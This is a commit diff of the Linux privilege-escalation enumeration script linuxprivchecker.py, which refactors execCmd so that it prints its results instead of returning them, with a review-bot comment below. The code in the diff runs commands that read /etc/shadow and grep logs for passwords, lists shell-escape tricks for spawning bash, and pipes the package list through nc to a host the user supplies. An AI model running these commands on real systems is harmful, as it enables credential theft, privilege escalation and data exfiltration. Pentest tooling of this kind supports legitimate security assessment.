Projects STRLCPY linuxprivchecker Commits 81c83980
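--- a/linuxprivchecker.py
+++ b/linuxprivchecker.py
@@ -57,7 +57,7 @@
  results = ['[-] failed: {}'.format(e)]
  cmdDict[item]["results"]=results
 
- return cmdDict
+ printResults(cmdDict)
 
 # print results for each previously executed command, no return value
 def printResults(cmdDict):
@@ -72,7 +72,7 @@
  return
 
 def writeResults(msg, results):
- f = open("privcheckout.txt", "a");
+ f = open("privcheckout.txt", "a")
  f.write("[+] " + str(len(results)-1) + " " + msg)
  for result in results:
  if result.strip() != "":
@@ -90,8 +90,7 @@
  "HOSTNAME":{"cmd":"hostname", "msg":"Hostname"}
  }
 
-sysInfo = execCmd(sysInfo)
-printResults(sysInfo)
+execCmd(sysInfo)
 
 # Networking Info
 
@@ -105,8 +104,7 @@
  "SS":{"cmd":"ss -antup", "msg":"ss"}
  }
 
-netInfo = execCmd(netInfo)
-printResults(netInfo)
+execCmd(netInfo)
 
 # File System Info
 print( "[*] GETTING FILESYSTEM INFO...\n")
@@ -115,16 +113,14 @@
  "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries"}
  }
 
-driveInfo = execCmd(driveInfo)
-printResults(driveInfo)
+execCmd(driveInfo)
 
 # Scheduled Cron Jobs
 cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs"},
  "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs"}
  }
 
-cronInfo = execCmd(cronInfo)
-printResults(cronInfo)
+execCmd(cronInfo)
 
 # User Info
 print("\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n")
@@ -139,8 +135,7 @@
  "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity"}
  }
 
-userInfo = execCmd(userInfo)
-printResults(userInfo)
+execCmd(userInfo)
 
 if "root" in userInfo["ID"]["results"][0]:
  print("[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n")
@@ -155,16 +150,14 @@
  "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible"}
  }
 
-fdPerms = execCmd(fdPerms)
-printResults(fdPerms)
+execCmd(fdPerms)
 
 pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'"},
  "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'"},
  "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)"}
  }
 
-pwdFiles = execCmd(pwdFiles)
-printResults(pwdFiles)
+execCmd(pwdFiles)
 
 # Processes and Applications
 print("[*] ENUMERATING PROCESSES AND APPLICATIONS...\n")
@@ -177,15 +170,13 @@
 getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes"},
  "PKGS":{"cmd":getPkgs, "msg":"Installed Packages"}}
 
-getAppProc = execCmd(getAppProc)
-printResults(getAppProc) # comment to reduce output
+execCmd(getAppProc)
 
 otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)"},
  "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules"},
  "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File"}}
 
-otherApps = execCmd(otherApps)
-printResults(otherApps)
+execCmd(otherApps)
 
 print("[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n")
 
@@ -233,8 +224,7 @@
 print("\n[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n")
 
 devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools"}}
-devTools = execCmd(devTools)
-printResults(devTools)
+execCmd(devTools)
 
 print("[+] Related Shell Escape Sequences...\n")
 escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
@@ -251,8 +241,7 @@
  port = input("[?] What port is the server using? ")
  print("[ ] Connecting to {}:{}".format(server,port))
  exploits = {"EXPLOITS":{"cmd":"dpkg -l | tail -n +6 | awk '{{print $2, $3}} END {{print \"\"}}' | nc {} {}".format(server, port), "msg":"Found the following possible exploits"}}
- exploits_results = execCmd(exploits)
- printResults(exploits)
+ execCmd(exploits)
 
 print("\n[+] Finished")
 print(bigline)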
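Review bot: Any caller that still assigns `x = execCmd(x)` now rebinds its dict to None, because `execCmd` ends in `printResults(cmdDict)` (new line 60) where it used to `return cmdDict`; every call site visible here was updated, but the skipped regions cannot be checked from this page. Keeping `return cmdDict` after the print call would stay backward-compatible, and since later code such as `userInfo["ID"]["results"][0]` (new line 140) relies on the in-place update, `execCmd` (its `def` is outside the hunk) deserves a comment like `# run each command, store output under "results" in place, print it`. Printing is also no longer optional per call, which the removed `# comment to reduce output` hint allowed. Separately, the touched `open("privcheckout.txt", "a")` in `writeResults` (new line 75) is still not a `with open(...) as f:` block, and if output from sets such as `pwdFiles` (`cat /etc/shadow`, password greps) is written there the file should be created owner-only rather than under the default umask; the rest of `writeResults` is skipped, so an existing `close()` cannot be ruled out.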